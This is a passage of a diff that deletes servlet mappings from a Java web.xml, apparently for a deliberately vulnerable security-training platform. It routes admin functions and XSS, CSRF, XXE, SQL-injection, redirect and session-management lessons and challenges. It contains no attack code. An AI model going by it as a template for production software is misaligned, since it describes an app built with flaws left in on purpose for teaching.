-        <servlet-name>/unSuspendPlayer</servlet-name>
-        <url-pattern>/unSuspendPlayer</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/giveTakePoints</servlet-name>
-        <servlet-class>servlets.admin.userManagement.GiveTakePoints</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/giveTakePoints</servlet-name>
-        <url-pattern>/giveTakePoints</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/upgradePlayer</servlet-name>
-        <servlet-class>servlets.admin.userManagement.UpgradePlayer</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/upgradePlayer</servlet-name>
-        <url-pattern>/upgradePlayer</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/downgradeAdmin</servlet-name>
-        <servlet-class>servlets.admin.userManagement.DowngradeAdmin</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/downgradeAdmin</servlet-name>
-        <url-pattern>/downgradeAdmin</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/updateRegistration</servlet-name>
-        <servlet-class>servlets.admin.config.ToggleRegistration</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/updateRegistration</servlet-name>
-        <url-pattern>/updateRegistration</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/changeUserPassword</servlet-name>
-        <servlet-class>servlets.admin.userManagement.ChangeUserPassword</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/changeUserPassword</servlet-name>
-        <url-pattern>/changeUserPassword</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/getProgress</servlet-name>
-        <servlet-class>servlets.admin.moduleManagement.GetProgress</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/getProgress</servlet-name>
-        <url-pattern>/getProgress</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/openEveryModules</servlet-name>
-        <servlet-class>servlets.admin.moduleManagement.OpenAllModules</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/openEveryModules</servlet-name>
-        <url-pattern>/openEveryModules</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/tournamentModeModules</servlet-name>
-        <servlet-class>servlets.admin.config.SetTournamentMode</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/tournamentModeModules</servlet-name>
-        <url-pattern>/tournamentModeModules</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/closeEveryModules</servlet-name>
-        <servlet-class>servlets.admin.moduleManagement.CloseAllModules</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/closeEveryModules</servlet-name>
-        <url-pattern>/closeEveryModules</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/openWebModules</servlet-name>
-        <servlet-class>servlets.admin.moduleManagement.OpenWebModules</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/openWebModules</servlet-name>
-        <url-pattern>/openWebModules</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/openMobileModules</servlet-name>
-        <servlet-class>servlets.admin.moduleManagement.OpenMobileModules</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/openMobileModules</servlet-name>
-        <url-pattern>/openMobileModules</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/enableModuleBlock</servlet-name>
-        <servlet-class>servlets.admin.moduleManagement.EnableModuleBlock</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/enableModuleBlock</servlet-name>
-        <url-pattern>/enableModuleBlock</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/removeModuleLock</servlet-name>
-        <servlet-class>servlets.admin.moduleManagement.RemoveModuleLock</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/removeModuleLock</servlet-name>
-        <url-pattern>/removeModuleLock</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/getJsonProgress</servlet-name>
-        <servlet-class>servlets.admin.moduleManagement.GetJsonProgress</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/getJsonProgress</servlet-name>
-        <url-pattern>/getJsonProgress</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/EnableScoreboard</servlet-name>
-        <servlet-class>servlets.admin.config.EnableScoreboard</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/EnableScoreboard</servlet-name>
-        <url-pattern>/EnableScoreboard</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/DisableScoreboard</servlet-name>
-        <servlet-class>servlets.admin.config.DisableScoreboard</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/DisableScoreboard</servlet-name>
-        <url-pattern>/DisableScoreboard</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/scoreboard</servlet-name>
-        <servlet-class>servlets.GetJsonScore</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/scoreboard</servlet-name>
-        <url-pattern>/scoreboard</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/enableCheats</servlet-name>
-        <servlet-class>servlets.admin.config.EnableCheats</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/enableCheats</servlet-name>
-        <url-pattern>/enableCheats</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/disableCheats</servlet-name>
-        <servlet-class>servlets.admin.config.DisableCheats</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/disableCheats</servlet-name>
-        <url-pattern>/disableCheats</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/getCheat</servlet-name>
-        <servlet-class>servlets.module.GetCheat</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/getCheat</servlet-name>
-        <url-pattern>/getCheat</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/getModule</servlet-name>
-        <servlet-class>servlets.module.GetModule</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/getModule</servlet-name>
-        <url-pattern>/getModule</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/solutionSubmit</servlet-name>
-        <servlet-class>servlets.module.SolutionSubmit</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/solutionSubmit</servlet-name>
-        <url-pattern>/solutionSubmit</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/feedbackSubmit</servlet-name>
-        <servlet-class>servlets.module.FeedbackSubmit</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/feedbackSubmit</servlet-name>
-        <url-pattern>/feedbackSubmit</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/openFloorModules</servlet-name>
-        <servlet-class>servlets.admin.config.SetOpenFloorMode</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/openFloorModules</servlet-name>
-        <url-pattern>/openFloorModules</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/setCtfMode</servlet-name>
-        <servlet-class>servlets.admin.config.SetCtfMode</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/setCtfMode</servlet-name>
-        <url-pattern>/setCtfMode</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/getFeedback</servlet-name>
-        <servlet-class>servlets.admin.moduleManagement.GetFeedback</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/getFeedback</servlet-name>
-        <url-pattern>/getFeedback</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/setModuleStatus</servlet-name>
-        <servlet-class>servlets.admin.moduleManagement.SetModuleStatus</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/setModuleStatus</servlet-name>
-        <url-pattern>/setModuleStatus</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/openCloseModuleCategories</servlet-name>
-        <servlet-class>servlets.admin.moduleManagement.OpenOrCloseByCategory</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/openCloseModuleCategories</servlet-name>
-        <url-pattern>/openCloseModuleCategories</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/changeHostAddress</servlet-name>
-        <servlet-class>servlets.admin.config.ChangeHostAddress</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/changeHostAddress</servlet-name>
-        <url-pattern>/changeHostAddress</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/changeVulnerableAppRoot</servlet-name>
-        <servlet-class>servlets.admin.config.ChangeVulnerableAppRoot</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/changeVulnerableAppRoot</servlet-name>
-        <url-pattern>/changeVulnerableAppRoot</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/lessons/57dda1bf9a2ca1c34e04f815491ef40836d9b710179cd19754ec5b3c31f27d1a</servlet-name>
-        <servlet-class>servlets.module.lesson.XxeLesson</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/lessons/57dda1bf9a2ca1c34e04f815491ef40836d9b710179cd19754ec5b3c31f27d1a</servlet-name>
-        <url-pattern>/lessons/57dda1bf9a2ca1c34e04f815491ef40836d9b710179cd19754ec5b3c31f27d1a</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/lessons/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a</servlet-name>
-        <servlet-class>servlets.module.lesson.XssLesson</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/lessons/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a</servlet-name>
-        <url-pattern>/lessons/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/d72ca2694422af2e6b3c5d90e4c11e7b4575a7bc12ee6d0a384ac2469449e8fa</servlet-name>
-        <servlet-class>servlets.module.challenge.XssChallengeOne</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/d72ca2694422af2e6b3c5d90e4c11e7b4575a7bc12ee6d0a384ac2469449e8fa</servlet-name>
-        <url-pattern>/challenges/d72ca2694422af2e6b3c5d90e4c11e7b4575a7bc12ee6d0a384ac2469449e8fa</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888</servlet-name>
-        <servlet-class>servlets.module.challenge.XssChallengeTwo</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888</servlet-name>
-        <url-pattern>/challenges/t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/ad2628bcc79bf10dd54ee62de148ab44b7bd028009a908ce3f1b4d019886d0e</servlet-name>
-        <servlet-class>servlets.module.challenge.XssChallengeThree</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/ad2628bcc79bf10dd54ee62de148ab44b7bd028009a908ce3f1b4d019886d0e</servlet-name>
-        <url-pattern>/challenges/ad2628bcc79bf10dd54ee62de148ab44b7bd028009a908ce3f1b4d019886d0e</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/lessons/ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7</servlet-name>
-        <servlet-class>servlets.module.lesson.CsrfLesson</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/lessons/ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7</servlet-name>
-        <url-pattern>/lessons/ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/root/grantComplete/csrfLesson</servlet-name>
-        <servlet-class>servlets.module.lesson.CsrfLessonTarget</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/root/grantComplete/csrfLesson</servlet-name>
-        <url-pattern>/root/grantComplete/csrfLesson</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/user/csrfchallengeone/plusplus</servlet-name>
-        <servlet-class>servlets.module.challenge.CsrfChallengeTargetOne</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/user/csrfchallengeone/plusplus</servlet-name>
-        <url-pattern>/user/csrfchallengeone/plusplus</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/user/csrfchallengetwo/plusplus</servlet-name>
-        <servlet-class>servlets.module.challenge.CsrfChallengeTargetTwo</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/user/csrfchallengetwo/plusplus</servlet-name>
-        <url-pattern>/user/csrfchallengetwo/plusplus</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/user/csrfchallengejson/plusplus</servlet-name>
-        <servlet-class>servlets.module.challenge.CsrfChallengeTargetJSON</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/user/csrfchallengejson/plusplus</servlet-name>
-        <url-pattern>/user/csrfchallengejson/plusplus</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/user/csrfchallengethree/plusplus</servlet-name>
-        <servlet-class>servlets.module.challenge.CsrfChallengeTargetThree</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/user/csrfchallengethree/plusplus</servlet-name>
-        <url-pattern>/user/csrfchallengethree/plusplus</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/s74a796e84e25b854906d88f622170c1c06817e72b526b3d1e9a6085f429cf52</servlet-name>
-        <servlet-class>servlets.module.challenge.CsrfChallengeOne</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/s74a796e84e25b854906d88f622170c1c06817e72b526b3d1e9a6085f429cf52</servlet-name>
-        <url-pattern>/challenges/s74a796e84e25b854906d88f622170c1c06817e72b526b3d1e9a6085f429cf52</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/z311736498a13604705d608fb3171ebf49bc18753b0ec34b8dff5e4f9147eb5e</servlet-name>
-        <servlet-class>servlets.module.challenge.CsrfChallengeTwo</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/z311736498a13604705d608fb3171ebf49bc18753b0ec34b8dff5e4f9147eb5e</servlet-name>
-        <url-pattern>/challenges/z311736498a13604705d608fb3171ebf49bc18753b0ec34b8dff5e4f9147eb5e</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/2e0981dcb8278a57dcfaae3b8da0c78d5a70c2d38ea9d8b3e14db3aea01afcbb</servlet-name>
-        <servlet-class>servlets.module.challenge.CsrfChallengeJSON</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/2e0981dcb8278a57dcfaae3b8da0c78d5a70c2d38ea9d8b3e14db3aea01afcbb</servlet-name>
-        <url-pattern>/challenges/2e0981dcb8278a57dcfaae3b8da0c78d5a70c2d38ea9d8b3e14db3aea01afcbb</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/z6b2f5ebbe112dd09a6c430a167415820adc5633256a7b44a7d1e262db105e3c</servlet-name>
-        <servlet-class>servlets.module.challenge.CsrfChallengeThree</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/z6b2f5ebbe112dd09a6c430a167415820adc5633256a7b44a7d1e262db105e3c</servlet-name>
-        <url-pattern>/challenges/z6b2f5ebbe112dd09a6c430a167415820adc5633256a7b44a7d1e262db105e3c</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/lessons/f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f</servlet-name>
-        <servlet-class>servlets.module.lesson.UnvalidatedForwardsLesson</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/lessons/f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f</servlet-name>
-        <url-pattern>/lessons/f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/root/grantcomplete/unvalidatedredirectlesson</servlet-name>
-        <servlet-class>servlets.module.lesson.RedirectLessonTarget</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/root/grantcomplete/unvalidatedredirectlesson</servlet-name>
-        <url-pattern>/root/grantcomplete/unvalidatedredirectlesson</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/user/redirect</servlet-name>
-        <servlet-class>servlets.module.lesson.Redirect</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/user/redirect</servlet-name>
-        <url-pattern>/user/redirect</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/changeCoreHostAddress</servlet-name>
-        <servlet-class>servlets.admin.config.ChangeCoreHostAddress</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/changeCoreHostAddress</servlet-name>
-        <url-pattern>/changeCoreHostAddress</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/changeCoreDatabase</servlet-name>
-        <servlet-class>servlets.admin.config.ChangeCoreDatabase</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/changeCoreDatabase</servlet-name>
-        <url-pattern>/changeCoreDatabase</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/changeExposedDatabase</servlet-name>
-        <servlet-class>servlets.admin.config.ChangeExposedDatabase</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/changeExposedDatabase</servlet-name>
-        <url-pattern>/changeExposedDatabase</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/enableFeedback</servlet-name>
-        <servlet-class>servlets.admin.config.EnableFeedback</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/enableFeedback</servlet-name>
-        <url-pattern>/enableFeedback</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/disableFeedback</servlet-name>
-        <servlet-class>servlets.admin.config.DisableFeedback</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/disableFeedback</servlet-name>
-        <url-pattern>/disableFeedback</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/cancelConfigPrompt</servlet-name>
-        <servlet-class>servlets.admin.config.NoMoreQuickConfig</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/cancelConfigPrompt</servlet-name>
-        <url-pattern>/cancelConfigPrompt</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751</servlet-name>
-        <servlet-class>servlets.module.challenge.XssChallengeFour</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751</servlet-name>
-        <url-pattern>/challenges/06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/f37d45f597832cdc6e91358dca3f53039d4489c94df2ee280d6203b389dd5671</servlet-name>
-        <servlet-class>servlets.module.challenge.XssChallengeFive</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/f37d45f597832cdc6e91358dca3f53039d4489c94df2ee280d6203b389dd5671</servlet-name>
-        <url-pattern>/challenges/f37d45f597832cdc6e91358dca3f53039d4489c94df2ee280d6203b389dd5671</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/70b96195472adf3bf347cbc37c34489287969d5ba504ac2439915184d6e5dc49</servlet-name>
-        <servlet-class>servlets.module.challenge.CsrfChallengeFive</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/70b96195472adf3bf347cbc37c34489287969d5ba504ac2439915184d6e5dc49</servlet-name>
-        <url-pattern>/challenges/70b96195472adf3bf347cbc37c34489287969d5ba504ac2439915184d6e5dc49</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/user/csrfchallengefive/plusplus</servlet-name>
-        <servlet-class>servlets.module.challenge.CsrfChallengeTargetFive</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/user/csrfchallengefive/plusplus</servlet-name>
-        <url-pattern>/user/csrfchallengefive/plusplus</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/2fff41105149e507c75b5a54e558470469d7024929cf78d570cd16c03bee3569</servlet-name>
-        <servlet-class>servlets.module.challenge.CsrfChallengeSix</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/2fff41105149e507c75b5a54e558470469d7024929cf78d570cd16c03bee3569</servlet-name>
-        <url-pattern>/challenges/2fff41105149e507c75b5a54e558470469d7024929cf78d570cd16c03bee3569</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/user/csrfchallengesix/plusplus</servlet-name>
-        <servlet-class>servlets.module.challenge.CsrfChallengeTargetSix</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/user/csrfchallengesix/plusplus</servlet-name>
-        <url-pattern>/user/csrfchallengesix/plusplus</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/7d79ea2b2a82543d480a63e55ebb8fef3209c5d648b54d1276813cd072815df3</servlet-name>
-        <servlet-class>servlets.module.challenge.CsrfChallengeSeven</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/7d79ea2b2a82543d480a63e55ebb8fef3209c5d648b54d1276813cd072815df3</servlet-name>
-        <url-pattern>/challenges/7d79ea2b2a82543d480a63e55ebb8fef3209c5d648b54d1276813cd072815df3</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/user/csrfchallengeseven/plusplus</servlet-name>
-        <servlet-class>servlets.module.challenge.CsrfChallengeTargetSeven</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/user/csrfchallengeseven/plusplus</servlet-name>
-        <url-pattern>/user/csrfchallengeseven/plusplus</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/84118752e6cd78fecc3563ba2873d944aacb7b72f28693a23f9949ac310648b5</servlet-name>
-        <servlet-class>servlets.module.challenge.CsrfChallengeFour</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/84118752e6cd78fecc3563ba2873d944aacb7b72f28693a23f9949ac310648b5</servlet-name>
-        <url-pattern>/challenges/84118752e6cd78fecc3563ba2873d944aacb7b72f28693a23f9949ac310648b5</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/user/csrfchallengefour/plusplus</servlet-name>
-        <servlet-class>servlets.module.challenge.CsrfChallengeTargetFour</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/user/csrfchallengefour/plusplus</servlet-name>
-        <url-pattern>/user/csrfchallengefour/plusplus</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/user/csrfchallengeseven/getToken</servlet-name>
-        <servlet-class>servlets.module.challenge.CsrfChallengeSevenGetToken</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/user/csrfchallengeseven/getToken</servlet-name>
-        <url-pattern>/user/csrfchallengeseven/getToken</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/d330dea1acf21886b685184ee222ea8e0a60589c3940afd6ebf433469e997caf</servlet-name>
-        <servlet-class>servlets.module.challenge.XssChallengeSix</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/d330dea1acf21886b685184ee222ea8e0a60589c3940afd6ebf433469e997caf</servlet-name>
-        <url-pattern>/challenges/d330dea1acf21886b685184ee222ea8e0a60589c3940afd6ebf433469e997caf</url-pattern>
-    </servlet-mapping>
-
-
-    <servlet>
-        <servlet-name>/lessons/e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594</servlet-name>
-        <servlet-class>servlets.module.lesson.SqlInjectionLesson</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/lessons/e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594</servlet-name>
-        <url-pattern>/lessons/e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/lessons/a59bf026c49b603759662b5cfe70b8d292e68650cc3cb5c2fc964e8ea2ce9aca</servlet-name>
-        <servlet-class>servlets.a59bf026c49b603759662b5cfe70b8d292e68650cc3cb5c2fc964e8ea2ce9aca</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/lessons/a59bf026c49b603759662b5cfe70b8d292e68650cc3cb5c2fc964e8ea2ce9aca</servlet-name>
-        <url-pattern>/lessons/a59bf026c49b603759662b5cfe70b8d292e68650cc3cb5c2fc964e8ea2ce9aca</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/ffd39cb26727f34cbf9fce3e82b9d703404e99cdef54d2aa745f497abe070b</servlet-name>
-        <servlet-class>servlets.module.challenge.SqlInjectionEmail</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/ffd39cb26727f34cbf9fce3e82b9d703404e99cdef54d2aa745f497abe070b</servlet-name>
-        <url-pattern>/challenges/ffd39cb26727f34cbf9fce3e82b9d703404e99cdef54d2aa745f497abe070b</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/e1e109444bf5d7ae3d67b816538613e64f7d0f51c432a164efc8418513711b0a</servlet-name>
-        <servlet-class>servlets.module.challenge.SqlInjection1</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/e1e109444bf5d7ae3d67b816538613e64f7d0f51c432a164efc8418513711b0a</servlet-name>
-        <url-pattern>/challenges/e1e109444bf5d7ae3d67b816538613e64f7d0f51c432a164efc8418513711b0a</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/b7327828a90da59df54b27499c0dc2e875344035e38608fcfb7c1ab8924923f6</servlet-name>
-        <servlet-class>servlets.module.challenge.SqlInjection3</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/b7327828a90da59df54b27499c0dc2e875344035e38608fcfb7c1ab8924923f6</servlet-name>
-        <url-pattern>/challenges/b7327828a90da59df54b27499c0dc2e875344035e38608fcfb7c1ab8924923f6</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/lessons/b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806</servlet-name>
-        <servlet-class>servlets.module.lesson.SessionManagementLesson</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/lessons/b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806</servlet-name>
-        <url-pattern>/lessons/b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/dfd6bfba1033fa380e378299b6a998c759646bd8aea02511482b8ce5d707f93a</servlet-name>
-        <servlet-class>servlets.module.challenge.SessionManagement1</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/dfd6bfba1033fa380e378299b6a998c759646bd8aea02511482b8ce5d707f93a</servlet-name>
-        <url-pattern>/challenges/dfd6bfba1033fa380e378299b6a998c759646bd8aea02511482b8ce5d707f93a</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/d779e34a54172cbc245300d3bc22937090ebd3769466a501a5e7ac605b9f34b7</servlet-name>
-        <servlet-class>servlets.module.challenge.SessionManagement2</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/d779e34a54172cbc245300d3bc22937090ebd3769466a501a5e7ac605b9f34b7</servlet-name>
-        <url-pattern>/challenges/d779e34a54172cbc245300d3bc22937090ebd3769466a501a5e7ac605b9f34b7</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/challenges/f5ddc0ed2d30e597ebacf5fdd117083674b19bb92ffc3499121b9e6a12c92959</servlet-name>
-        <servlet-class>servlets.module.challenge.SessionManagement2ChangePassword</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/challenges/f5ddc0ed2d30e597ebacf5fdd117083674b19bb92ffc3499121b9e6a12c92959</servlet-name>
-        <url-pattern>/challenges/f5ddc0ed2d30e597ebacf5fdd117083674b19bb92ffc3499121b9e6a12c92959</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
